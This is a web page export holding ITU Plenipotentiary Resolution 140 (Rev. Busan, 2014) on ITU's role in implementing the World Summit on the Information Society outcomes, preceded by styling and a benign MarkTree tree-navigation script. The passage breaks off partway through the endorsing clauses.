{"id":1679,"date":"2015-06-30T13:46:29","date_gmt":"2015-06-30T17:46:29","guid":{"rendered":"http:\/\/internetdistinction.com\/wsisimpacts\/?page_id=1679"},"modified":"2015-06-30T13:46:29","modified_gmt":"2015-06-30T17:46:29","slug":"pp-2014_140","status":"publish","type":"page","link":"https:\/\/internetdistinction.com\/wsisimpacts\/wsis\/plenipotentiary\/pp-2014\/pp-2014_140\/","title":{"rendered":"PP Resolution 140"},"content":{"rendered":"<p><style type=\"text\/css\">\nbody {}\n\n:link { color: #0000ff; text-decoration:none;}\n:visited { color: #6666ff; text-decoration:none; }\na:active { color: #0000ff; text-decoration:none;}\na:hover {color: #0000ff; text-decoration:underline; }\n\ndiv.basetext {}\n\ndiv.basetop {}\n\nh1 {\n    text-align:center;\n}\n\nspan.h2 {}\n\ndiv.year {}\n\ndiv.form {}\n\nspan.cpt {}\n\nspan.cm {}\n\n.fl {}\n\nul {}\n\nli {}\n\nul li {\n\tlist-style:square;\n\tfont-family:sans-serif;\n\tfont-weight:normal;\n}\n\nli.basic {\n\tlist-style:square;\n\tlist-style-image:none;\n  margin-top:2px;\n  margin-bottom:2px;\n}\n\nspan.links {\n}\n\n\n\n\n.sub { display: none; }\n.subexp {display: block; }\n.sub { display: none; } \n\n.subexp {display: block; } \n\nli.exp {\n  list-style-image:url(\"plus.png\");\n  margin-top:10px;\n  margin-bottom:10px;\n  cursor:pointer;\n}\n\nli.col {\n  list-style-image:url(\"minus.png\");\n  margin-top:10px;\n  margin-bottom:10px;\n  cursor:pointer;\n}\n\nli.exp_active {\n  list-style-image:url(\"plus.png\");\n  margin-top:10px;  \n  margin-bottom:10px;\n  background-color:#eeeeff;\n  cursor:pointer;\n}\n\nli.col_active {\n  list-style-image:url(\"minus.png\");\n  margin-top:10px;\n  margin-bottom:10px;\n  background-color:#eeeeff;\n  cursor:pointer; \/* if not included, bullets are not shown right in moz*\/\n}\n\n\nli.basic_active {\n  list-style:square;\n  list-style-image:none;\n  background-color:#eeeeff;\n  margin-top:2px;\n  margin-bottom:2px;\n}\n\n\/* the 'boxed' and 'attributes' styles are used to display notes and attributes\n*\/\n\n.boxed,.nodecontent {display:inline;}\n.boxed .note-and-attributes {display:none;}\n\n.boxed:hover .note-and-attributes {\n\tposition:fixed; top:2em;right:10px;z-index:3;\n\tdisplay:block;\n\tmin-width:33%;\n\tmax-width:60%;\n\tmax-height:95%;\n\tcolor:black;\n\tbackground:#ffffff;\n\tfont:normal 16px courier, sans-serif;\n\tborder:1px solid black;\n\tpadding:10px;\n}\n\n.note:before {\n\tcontent:\"NOTE: \";\n\tfont-weight:bold;\n}\n\ntable.attributes {\n\tborder-collapse:collapse;\n\tempty-cells:show;\n\tborder:thin black solid;\n}\ntable.attributes td,th {\n\tborder:thin black solid;\n\tpadding-top:2px;\n\tpadding-bottom:2px;\n\tpadding-left:3px;\n\tpadding-right:3px;\n}\ntable.attributes th {\n\ttext-align:center;\n}\ntable.attributes caption {\n\tmargin-top:1em;\n\tfont-style:italic;\n\ttext-align:center;\n}\n\/* Thanks to wolfgangradke, https:\/\/sourceforge.net\/forum\/message.php?msg_id=5991663 *\/\ndiv.nodecontent > p {\n\tmargin-top:0pt;\n\tmargin-bottom:0pt;\n\tdisplay:inline;\n}\n\np + p { \n \tmargin-top: 0.5em !important;\n\tdisplay:block !important;\n}\n\n\/* Thanks to erne100, https:\/\/sourceforge.net\/tracker\/?func=detail&atid=107118&aid=2747128&group_id=7118*\/\ntable {\n\tborder-collapse:collapse;\n\tempty-cells:show;\n\tborder:thin black solid;\n}\ntable td {\n\tborder:thin black solid;\n\tpadding-top:2px;\n\tpadding-bottom:2px;\n\tpadding-left:3px;\n\tpadding-right:3px;\n}\n\n\/* Thanks to erne100, https:\/\/sourceforge.net\/tracker\/?func=detail&atid=107118&aid=2747000&group_id=7118*\/\nol {\n\tmargin-top:1px;\n    margin-bottom:1px;\n\tmargin-left:0px;\n\tpadding-left:3%;\n}\n\nol li {\n\tlist-style:decimal;\n\tfont-family:sans-serif;\n\tfont-weight:normal;\n}\n<\/style><br \/>\n<script type=\"text\/javascript\">\r\n\/* MarkTree JavaScript code\r\n * \r\n * Distributed under the terms of the MIT License.\r\n * See \"LICENCE.MIT\" or http:\/\/www.opensource.org\/licenses\/mit-license.php for details.\r\n *\r\n * Software distributed under the License is distributed on an \"AS IS\" basis,\r\n * WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License\r\n * for the specific language governing rights and limitations under the\r\n * License.\r\n * \r\n * Miika Nurminen, 12.7.2004.\r\n *\/\r\n\r\n\/* cross-browser (tested with ie5, mozilla 1 and opera 5) keypress detection *\/\r\nfunction get_keycode(evt) {\r\n  \/\/ IE\r\n    code = document.layers ? evt.which\r\n           : document.all ? event.keyCode \/\/ event.keyCode!=evt.keyCode!\r\n           : evt.keyCode;\r\n\r\n  if (code==0) \r\n    code=evt.which; \/\/ for NS\r\n  return code;\r\n}\r\n\r\nvar lastnode=null;\r\nvar listnodes = null;\r\nvar list_index=1;\r\nvar lastnodetype=''; \/\/ determines if node is a link, input or text;\r\n\r\n\/\/ up, left, down, right, keypress codes\r\n\/\/ijkl\r\n\/\/var keys = new Array(105,106,107,108);\r\n\/\/num arrows\r\n\/\/var keys = new Array(56,52,50,54);\r\n\/\/wasd\r\n\/\/ var press2 = new Array(119,97,115,100);\r\n var press = new Array(47,45,42,43);\r\n\r\n\/\/ keydown codes\r\n  \/\/  var keys2=new Array(87,65,83,68);\r\n  var keys= new Array(38,37,40,39);\r\n\r\n  \/\/ keyset 1 = keydown, otherwise press\r\nfunction checkup(keyset,n) {\r\n  if (keyset==1) return (n==keys[0]);\r\n  return ((n==press[0]) \/*|| (n==press2[0])*\/)\r\n}\r\n\r\nfunction checkdn(keyset,n) {\r\n  if (keyset==1) return (n==keys[2]);\r\n  return ((n==press[2]) \/*|| (n==press2[2])*\/)\r\n}\r\n\r\nfunction checkl(keyset,n) {\r\n  if (keyset==1) return (n==keys[1]);\r\n  return ((n==press[1]) \/*|| (n==press2[1])*\/)\r\n}\r\n\r\nfunction checkr(keyset,n) {\r\n  if (keyset==1) return (n==keys[3]);\r\n  return ((n==press[3]) \/*|| (n==press2[3])*\/)\r\n}\r\n\r\n\r\n\r\n\r\n\r\nfunction is_exp(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='exp') || (n.className=='exp_active'));\r\n}\r\n\r\nfunction is_col(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='col') || (n.className=='col_active'));\r\n}\r\n\r\nfunction is_basic(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='basic') || (n.className=='basic_active'));\r\n}\r\n\r\n\r\n\r\n\/* returns i>=0 if true *\/\r\nfunction is_active(node) {\r\n  if (node.className==null) return false\r\n  return node.className.indexOf('_active');\r\n}\r\n\r\nfunction toggle_class(node) {\r\n  if ((node==null) || (node.className==null)) return;\r\n  str=node.className;\r\n  result=\"\";\r\n  i = str.indexOf('_active');\r\n  if (i>0)\r\n    result= str.substr(0,i);\r\n  else\r\n    result= str+\"_active\";\r\n  node.className=result; \r\n  return node;\r\n}\r\n\r\nfunction activate(node) {\r\n  node.style.backgroundColor='#eeeeff';\r\n}\r\n\r\nfunction deactivate(node) {\r\n   node.style.backgroundColor='#ffffff';\r\n}\r\n\r\nfunction is_list_node(n) {\r\n  if (n==null) return false;\r\n  if (n.className==null) return false;\r\n  if ( (is_exp(n)) || \r\n       (is_col(n)) ||\r\n       (is_basic(n)) )\r\n   return true; else return false;\r\n}\r\n\r\n\r\nfunction get_href(n) {\r\n  alist=n.attributes;\r\n  if (alist!=null) {\r\n    hr = alist.getNamedItem('href');\r\n    if (hr!=null) return hr.nodeValue;\r\n  }\r\n  if (n.childNodes.length==0) return '';\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_href(n.childNodes[i]);\r\n    if (s!='') return s;\r\n  }\r\n  return '';\r\n}\r\n\r\nfunction get_link(n) {\r\n  if (n==null) return null;\r\n  if (n.style==null) return null;\r\n\r\n \/\/ disabling uncontrolled recursion to prevent error messages on IE\r\n \/\/ when trying to focus to invisible links (readonly mode)\r\n\/\/    alert(n.nodeName+' '+n.className);\r\n  if ((n.nodeName=='UL') && (n.className=='sub')) return null;\r\n\r\n  if (n.nodeName=='A') return n;\r\n  if (n.childNodes.length==0) return null;\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_link(n.childNodes[i]);\r\n    if (s!=null) return s;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction set_lastnode(n) {\r\n\/*var d = new Date();\r\nvar t_mil = d.getMilliseconds();*\/\r\n\/\/ testattu nopeuksia explorerilla, ei merkitt\u2030vi\u2030 eroja\r\n  if (lastnode==n) return; \r\n\/*  deactivate(lastnode)\r\n  lastnode=n;\r\n  activate(lastnode);*\/\r\n\r\n  if (is_active(lastnode)>=0)\r\n    toggle_class(lastnode);\r\n  lastnode=n;\r\n  if (!(is_active(lastnode)>=0))\r\n    toggle_class(lastnode);\r\n\r\n\r\n\/*var d2 = new Date();\r\nvar t_mil2 = d2.getMilliseconds();\r\n  window.alert(t_mil2-t_mil);*\/\r\n}\r\n\r\nfunction next_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex<listnodes.length-1) {\r\n    tempIndex++;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\nfunction prev_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex>0) {\r\n    tempIndex--;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\n\r\n\r\nfunction getsub (li) {\r\n  if (li.childNodes.length==0) return null;\r\n  for (var c = 0; c < li.childNodes.length; c++)\r\n    if ( (li.childNodes[c].className == 'sub') || (li.childNodes[c].className == 'subexp') ) \r\n      return li.childNodes[c];\r\n}\r\n\r\nfunction find_listnode_recursive (li) {\r\n  if (is_list_node(li)) return li; \r\n  if (li.childNodes.length==0) return null;\r\n  result=null;\r\n  for (var c = 0; c < li.childNodes.length; c++) {\r\n    result=find_listnode_recursive(li.childNodes[c]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction next_child_listnode(li) {\r\n  var result=null;\r\n  for (var i=0; i<li.childNodes.length; i++) {\r\n    result=find_listnode_recursive(li.childNodes[i]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;  \r\n}\r\n\r\nfunction next_actual_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction next_sibling_listnode(li) {\r\nif (li==null) return null; \r\n var result=null;\r\n  var temp=li;\r\n  if (is_col(temp)) return next_child_listnode(temp);\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction last_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var last=null;\r\n  while(1) {\r\n    var n = temp.nextSibling;\r\n    if (is_list_node(temp)) \r\n      last = temp;\r\n    if (n==null) {\r\n      if (is_col(last)) return last_sibling_listnode(next_child_listnode(last));\r\n      else return last;\r\n    }\r\n    temp = n;\r\n  }\r\n}\r\n\r\nfunction prev_sibling_listnode(li) { \r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var n = null;\r\n  while (1) { \r\n    n = temp.previousSibling;\r\n    if (n==null) {\r\n      return parent_listnode(li);\r\n    }\r\n    if (is_list_node(n)) {\r\n      if (is_col(n)) { \r\n        return last_sibling_listnode(next_child_listnode(n));\r\n      }\r\n      else {\r\n        return n;\r\n      }\r\n    }\r\n    temp=n;\r\n  }\r\n}\r\n\r\n\r\nfunction parent_listnode(li) {\r\n  \/\/ added 12.7.2004 to prevent IE error when readonly mode==true\r\n  if (li==null) return null;\r\n  n=li;\r\n  while (1) {\r\n    n=n.parentNode;\r\n    if (n==null) return null;\r\n    if (is_list_node(n)) return n;\r\n  }\r\n}\r\n\r\nfunction getVisibleParents(id) {\r\n  var n = document.getElementById(id);\r\n  while(1) {\r\n    expand(n);\r\n    n = parent_listnode(n);\r\n    if (n==null) return;\r\n  }\r\n}\r\n\r\nfunction onClickHandler (evt) {\r\nif (lastnode==null) \r\n{\r\nlistnodes = document.getElementsByTagName('li');\r\nlastnode=listnodes[1];\r\ntemp=listnodes[1];\r\n}\r\n\r\n\r\n  var target = evt ? evt.target : event.srcElement;\r\n  if (!is_list_node(target)) return;\r\n  toggle(target);\r\n  set_lastnode(target);\r\n}\r\n\r\n\r\nfunction expand(node) {\r\n    if (!is_exp(node)) return;\r\n    if (node.className=='exp_active') \r\n      node.className='col_active';\r\n    else \r\n        node.className='col';\r\n    setSubClass(node,'subexp');\r\n    \/\/    getsub(node).className='subexp';\r\n}\r\n\r\nfunction collapse(node) {\r\n  if (!is_col(node)) return;\r\n  \r\nif (node.className=='col_active')\r\n    node.className='exp_active'\r\n  else \r\n    node.className='exp';\r\n\r\n setSubClass(node,'sub');\r\n\/\/  getsub(node).className='sub';\r\n\r\n}\r\n\r\nfunction setSubClass(node,name) {\r\n  sub = getsub(node);\r\n  if (sub==null) return;\r\n  sub.className=name;  \r\n}\r\n\r\nfunction toggle(target) {\r\n  if (!is_list_node(target)) return;\r\n    if (is_col(target)) {\r\n      target.className='exp';\r\n      setSubClass(target,'sub');\r\n      \/\/      getsub(target).className='sub';\r\n    }\r\n    else if (is_exp(target)) {\r\n      target.className='col';\r\n      setSubClass(target,'subexp');\r\n      \/\/      getsub(target).className='subexp';\r\n    }\r\n \r\n}\r\n\r\nfunction expandAll(node) {\r\n    if (node.className=='exp') {\r\n        node.className='col';\r\n        setSubClass(node,'subexp');\r\n\/\/        getsub(node).className='subexp';\r\n    }\r\n    var i;\r\n    if (node.childNodes!=null) \r\n\/\/    if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            expandAll(node.childNodes[i]);\r\n}\r\n\r\nfunction collapseAll(node) {\r\n    if  (node.className=='col') {\r\n        node.className='exp';\r\n        setSubClass(node,'sub');\r\n\/\/        getsub(node).className='sub';\r\n    }\r\n    var i;        \r\n    if (node.childNodes!=null) \r\n\/\/ for opera   if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            collapseAll(node.childNodes[i]);\r\n}\r\n\r\n\r\n\r\nfunction unFocus(node) {\r\n     \/\/ unfocuses potential link that is to be hidden (if a==null there is no link so it should not be blurred).\r\n     \/\/ tested with mozilla 1.7, 12.7.2004. \/mn (\r\n      intemp=parent_listnode(node);  \r\n      a = get_link(intemp);     \/\/ added 6.4. to get keyboard working with\r\n      \/\/ moved before collapse to prevent an error message with IE when readonly==true      \r\n      if (a!=null) a.blur(); \/\/ netscape after collapsing a focused node\r\n      return intemp;\r\n}\r\n\r\n\/\/ mode: 0==keypress, 1==keyup\r\nfunction keyfunc(evt,mode) {\r\n var c = get_keycode(evt);\r\n var temp = null;\r\n var a = null;\r\n\r\n  if (lastnode==null) {\r\n    listnodes = document.getElementsByTagName('li');\r\n    lastnode=listnodes[1];\r\n    temp=listnodes[1];\r\n  }\r\n\r\n  \/\/window.alert(c);\r\n  if (checkup(mode,c)) { \/\/ i \r\n   temp=prev_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkdn(mode,c)) { \/\/ k\r\n    temp=next_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkr(mode,c)) { \/\/ l\r\n    expand(lastnode);\r\n    \/\/  temp=next_child_listnode(lastnode);\r\n    \/\/ if (temp==null) {\r\n      a = get_link(lastnode);\r\n        if (a!=null) a.focus(); else self.focus(); \r\n      \/\/}\r\n  }\r\n  else if (checkl(mode,c)) { \/\/ j\r\n    if (is_col(lastnode)) {\r\n      unFocus(lastnode);\r\n      collapse(lastnode);\r\n    }\r\n    else {\r\n      temp=unFocus(lastnode);\r\n      collapse(temp);\r\n    }\r\n   \/\/    if (temp==null) lastnode.focus(); \/\/ forces focus to correct div (try mozilla typesearch) (doesn't seem to work -mn\/6.4.2004)\r\n  }\r\n  else return;\r\n  if (temp!=null) set_lastnode(temp);\r\n\r\n  \/\/ alert('pressed ' + String.fromCharCode(c) + '(' + c + ')');\r\n  return true;\r\n}\r\n\r\n\r\nfunction keytest (evt) {\r\n  return keyfunc(evt,1);\r\n};\r\n\r\n\r\nfunction presstest (evt) {\r\n  return keyfunc(evt,0);\r\n};\r\n\r\n\r\n  document.onclick = onClickHandler;\r\n  document.onkeypress = presstest;\r\n  document.onkeyup = keytest;\r\n<\/script><\/p>\n<h3><span style=\"\">PP RESOLUTION 140 (Rev. Busan, 2014)<\/span><\/h3>\n<h4><span style=\"\">ITU&#8217;s role in implementing the outcomes of the World Summit on the Information Society and in the overall review by United Nations General Assembly of their implementation<\/span><\/h4>\n<p><span style=\"\">The Plenipotentiary Conference of the International Telecommunication Union ( Busan, 2014),<\/span><\/p>\n<ul class=\"subexp\">\n<li class=\"exp\">\n<div class=\"nodecontent\">recalling<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a)        Resolution 73 (Minneapolis, 1998) of the Plenipotentiary Conference, which achieved its aims in regard to the holding of both phases of the World Summit on the Information Society (WSIS);<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b)        Resolution 113 (Marrakesh, 2002) of the Plenipotentiary Conference, on WSIS;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c)        Decision 8 (Marrakesh, 2002) of the Plenipotentiary Conference, on ITU input to the WSIS Declaration of Principles and Plan of Action and the information document on ITU activities related to the Summit;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">d)        Resolution 172 (Guadalajara, 2010) of the Plenipotentiary Conference, on overall review of implementation of the WSIS outcomes,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">recalling further<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a)        the Geneva Declaration of Principles and the Geneva Plan of Action, adopted in 2003, and the Tunis Commitment and the Tunis Agenda for the Information Society, adopted in 2005, all of which were endorsed by the United Nations General Assembly;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b)        the outcomes of the 2012 United Nations Conference on Sustainable Development (Rio+20), referring to the role of ICTs for sustainable development;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c)        the Ministerial Round Table held at the WSIS Forum 2013;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">d)        the WSIS+10 Statement on Implementation of WSIS Outcomes and Vision for WSIS Beyond 2015, adopted at the ITU-coordinated WSIS+10 High-Level Event (Geneva, 2014);<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">e)        Resolution 68\/302 of the United Nations General Assembly (UNGA), on modalities for the overall review by the General Assembly of the implementation of the WSIS outcomes,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">considering<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a)        that ITU plays a fundamental role in providing global perspectives on the development of the information society;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b)         the role played by ITU in the successful organization of the two phases of WSIS and its coordination of the WSIS+10 High-Level Event;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c)        that the core competences of ITU in the fields of information and communication technologies (ICTs) \u2013 assistance in bridging the digital divide, international and regional cooperation, radio spectrum management, standards development and the dissemination of information \u2013 are of crucial importance for building the information society, as stated in \u00a7 64 of the Geneva Declaration of Principles;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">d)        that the Tunis Agenda stated that &#8220;each UN agency should act according to its mandate and competencies, and pursuant to decisions of their respective governing bodies, and within existing approved resources&#8221; (\u00a7 102 (b));<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">e)        the establishment of a United Nations Group on the Information Society (UNGIS) by the Secretary-General of the United Nations, at the request of the Summit, with the main objective of coordinating substantive and policy issues facing the United Nations&#8217; implementation of the WSIS outcomes, and that ITU is a permanent member of UNGIS, and shares a rotating chairmanship thereof;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">f)        that ITU, the United Nations Educational, Scientific and Cultural Organization (UNESCO) and the United Nations Development Programme (UNDP) are playing lead facilitation roles in the multistakeholder implementation of the Geneva Plan of Action and Tunis Agenda, as called upon by WSIS;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">g)        that ITU is the moderator\/facilitator for Action Lines C2 (Information and communication infrastructure), C5 (Building confidence and security in the use of ICTs) and C6 (Enabling environment) of the Tunis Agenda, and a potential partner for a number of other action lines, as identified by WSIS;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">h)         that the ITU is given specific responsibility for maintaining the WSIS stocktaking database (\u00a7 120 of the Tunis Agenda);<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">i)        that ITU is capable of providing expertise relevant to the Internet Governance Forum as demonstrated during the WSIS process (\u00a7 78a of the Tunis Agenda);<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">j)        that ITU has, inter alia, specific responsibility to study and report on international Internet connectivity (\u00a7\u00a7 27 and 50 of the Tunis Agenda);<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">k)        that ITU has a specific responsibility to ensure rational, efficient and economic use of, and equitable access to, the radio-frequency spectrum by all countries, based on relevant international agreements (\u00a7 96 of the Tunis Agenda);<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">l)        that the United Nations General Assembly, in its Resolution 60\/252, decided to conduct an overall review of the implementation of the Summit outcomes in 2015,<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">m)        the results of the meeting of the 68th session of the United Nations General Assembly (2014), on overall review of the implementation of WSIS outcomes in December 2015 (UNGA Resolution 68\/302);<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">n)        that &#8220;building an inclusive development-oriented information society will require unremitting multistakeholder effort\u2026 Taking into account the multifaceted nature of building the Information Society, effective cooperation among governments, private sector, civil society and United Nations and other international organizations, according to their roles and responsibilities and leveraging on their expertise, is essential&#8221; (\u00a7 83 of the Tunis Agenda),<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">considering further<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a)        that ITU and other international organizations should continue to cooperate and coordinate their activities where necessary for the global good;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b)        the need for ITU to evolve constantly in response to changes in the telecommunication\/ICT environment and, in particular, in respect of evolving technologies and new regulatory challenges;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c)        the needs of developing countries1, including in the areas of building telecommunication\/ICT infrastructure, strengthening confidence and security in the use of telecommunications\/ICT and implementation of the other WSIS goals;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">d)        the desirability of using ITU&#8217;s resources and expertise in a way which takes account of the rapid changes in the telecommunication environment and of the WSIS outcomes, taking into account the outcomes of the WSIS+10 High-Level Event, which will be reviewed under the UNGA overall review to take place in December 2015;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">e)        the need to carefully deploy the Union&#8217;s human and financial resources in a manner consistent with the priorities of the membership and cognizant of budgetary constraints, and the need to avoid duplication among the Bureaux and the General Secretariat;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">f)        that the full involvement of the membership, including Sector Members, as well as other stakeholders, is critical to successful ITU implementation of relevant WSIS outcomes;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">g)        that the strategic plan for the Union for 2016-2019 set out in Resolution 71 (Rev. Busan, 2014) of this conference contains a commitment to the implementation of the relevant WSIS outcomes in response to the changing telecommunication\/ICT environment and its effects on the Union, as well as the priority areas to be addressed in implementing the WSIS outcomes beyond 2015, subject to the outcomes of the UNGA overall review;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">h)        that the Council Working Group on WSIS (WG-WSIS) constitutes an effective mechanism for facilitating Member State inputs on the role of ITU in implementing WSIS outcomes, as envisaged by the plenipotentiary conferences (Antalya, 2006 and Guadalajara, 2010);<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">i)        that the ITU Council has approved roadmaps for Action Lines C2, C5 and C6, which have been updated and made available on the web, as well as WSIS-related activities, which have been included in the ITU Operational Plans for 2015-2018;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">j)        that the international community is invited to make voluntary contributions to the special trust fund set up by ITU to support activities relating to the implementation of WSIS outcomes;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">k)        that ITU is capable of providing expertise in the field of statistical work by developing ICT indicators, using appropriate indicators and benchmarking to track global progress, and measuring the digital divide (\u00a7\u00a7 113-118 of the Tunis Agenda),<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">noting<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a)        the holding of the World Summit on the Information Society Forum, organized annually by ITU in collaboration with the United Nations Conference on Trade and Development (UNCTAD), UNESCO and UNDP, and the holding of the 10-year review event of WSIS entitled &#8220;Towards Knowledge Societies for Peace and Sustainable Development&#8221;, coordinated by UNESCO in Paris in 2013;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b)        the establishment of the Broadband Commission for Digital Development at the invitation of the Secretary-General of ITU and the Director-General of UNESCO, taking note of the &#8220;Broadband targets for 2015&#8221;, which aim to make broadband policy universal and to increase affordability and uptake in support of internationally agreed development goals, including the United Nations Millennium Development Goals (MDGs),<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">taking into account<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a)        that WSIS acknowledged that multistakeholder participation is essential to the successful building of a people\u2011centred, inclusive and development-oriented information society;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b)        the nexus between issues of telecommunication development and those of economic, social and cultural development, as well as its impact on social and economic structures in all Member States;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c)        \u00a7 98 of the Tunis Agenda, which encourages strengthened and continuing cooperation between and among stakeholders and welcomes, in that respect, the ITU\u2011led Connect the World initiative;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">d)        that, in recent decades, the ICT landscape has dramatically changed progress in natural science, mathematics, engineering and technology: rapid innovation, diffusion and uptake of mobile technologies and improved access to the Internet have greatly expanded the gamut of opportunities that ICTs offer to promote inclusive development and bring the benefits of the information society to an increasing number of people around the world;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">e)        that UNGIS proposes that &#8220;in collaboration with other stakeholders, the UN system should seek to take full advantage of ICTs in addressing the development challenges of the 21st century and to recognize them as cross-cutting enablers for the achievement of all three pillars of sustainable development&#8221; and states that &#8220;the potential of ICTs as key enablers of development, and as critical components of innovative development solutions, is fully recognized in the Post-2015 Development Agenda&#8221;;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">f)        the outcomes of the ITU-coordinated WSIS+10 High-Level Event, based on the Multistakeholder Preparatory Platform, together with other UN agencies and inclusive of all WSIS stakeholders, which was conducted as an extended version of the WSIS Forum, under the mandates of the participating agencies and on a consensus basis;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">g)        that the ITU Secretary-General created the ITU WSIS Task Force, chaired by the Deputy Secretary-General, in order to fulfil, among others, the instructions handed down to the Secretary-General in Resolution 140 (Antalya, 2006) of the Plenipotentiary Conference;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">h)        the outcomes of the WSIS Forums held in 2011, 2012 and 2013, as well as the WSIS+10 High-Level Event (as an extended version of the WSIS Forum 2014) coordinated by ITU, held in Geneva in June 2014;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">i)        the ITU report entitled &#8220;WSIS+10 Report: ITU&#8217;s Ten Year Contribution to the WSIS implementation and follow-up (2005-2014)&#8221;, outlining WSIS-related activities of the Union,<\/div>\n<\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\">\n<div class=\"nodecontent\">endorsing<\/div>\n<ul class=\"sub\">\n<li class=\"basic\">\n<div class=\"nodecontent\">a)        Resolution 30 (Rev. Dubai, 2014) of the World Telecommunication Development Conference (WTDC), on the role of the ITU Telecommunication Development Sector (ITU\u2011D) in implementing the WSIS outcomes;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">b)        Resolution 139 (Rev. Busan, 2014) of this conference;<\/div>\n<\/li>\n<li class=\"basic\">\n<div class=\"nodecontent\">c)        the relevant results of the 2011-2014 sessions of the ITU Council, including Resolution 1332 